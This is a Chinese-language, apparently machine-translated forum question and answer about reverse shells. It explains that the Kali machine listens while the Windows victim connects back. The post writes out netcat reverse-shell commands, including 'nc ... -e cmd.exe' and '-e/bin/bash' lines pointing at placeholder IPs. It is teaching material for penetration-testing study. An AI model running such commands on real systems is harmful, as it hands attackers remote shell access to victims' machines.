创建一个从Windows系统到Kali机器的反向shell-哪个是侦听器



我知道什么是反向和绑定shell以及如何使用netcat/ncat来处理它们,但我在这里面临的问题(可能是因为我的母语不是英语(是这句话: "创建从 Windows 系统到 Kali 机器的反向外壳">

对我来说,这听起来像是在 Kali 机器上打开一个侦听器,并从 Windows 机器向 Kali 提供命令提示符。喜欢这个:

Linux :nc -nvlp portno --allow WindowsIP --ssl

Windows :nc -nv LinuxIP portno -e cmd.exe --ssl

但是我读得越多,它就越令人困惑(对我来说(。 定义类似

"反向外壳正在从受害者或目标获得连接 你的电脑">

或类似的例子:

"A 可以从 A 的 Linux 机器向 B 发送反向 shell:root@kali:~# nc -nv windowsIP Port -e/bin/bash">

这个例子增加了混乱,因为如果从Linux到Windows的反向shell意味着提供bash shell,那么将反向shell从Windows发送到Linux意味着提供cmd。

有人可以解释一下,在这种查询下,我们如何识别哪台机器应该是侦听器吗?

你的问题似乎是关于英语的。 我只能说你的解释是正确的:听众是Kali机器,受害者是Windows机器(其中提供某种类型的shell-通常是cmd或powershell(。

我不确定你为什么认为你强调的引文都不同意这一点。 也许第二句话让你失望了,因为在这种情况下,受害者是一台Linux机器,攻击者是Windows机器(它指定攻击者有一个windowsIP( - 这是非典型的,因为通常你从Kali攻击。 请注意,在这种情况下,他们将为您提供在受害者计算机上运行的命令,以连接回WindowsIP攻击计算机。

如果你来自Kali,并且能够在Windows受害者机器上远程执行代码,那么你需要在Windows机器上运行netcat,连接回你的Kali。 所以Kali正在监听来自Windows的连接。 当你攻击一台Windows机器时,你通常必须上传一个Windows二进制版本的netcat。 然后,您可以使用 shell cmd 或 Powershell 在 Windows 计算机上调用 netcat.exe。 当它连接回Kali时,你可以从攻击者Kali运行这些Windows shell命令。

相关内容

  • 没有找到相关文章

最新更新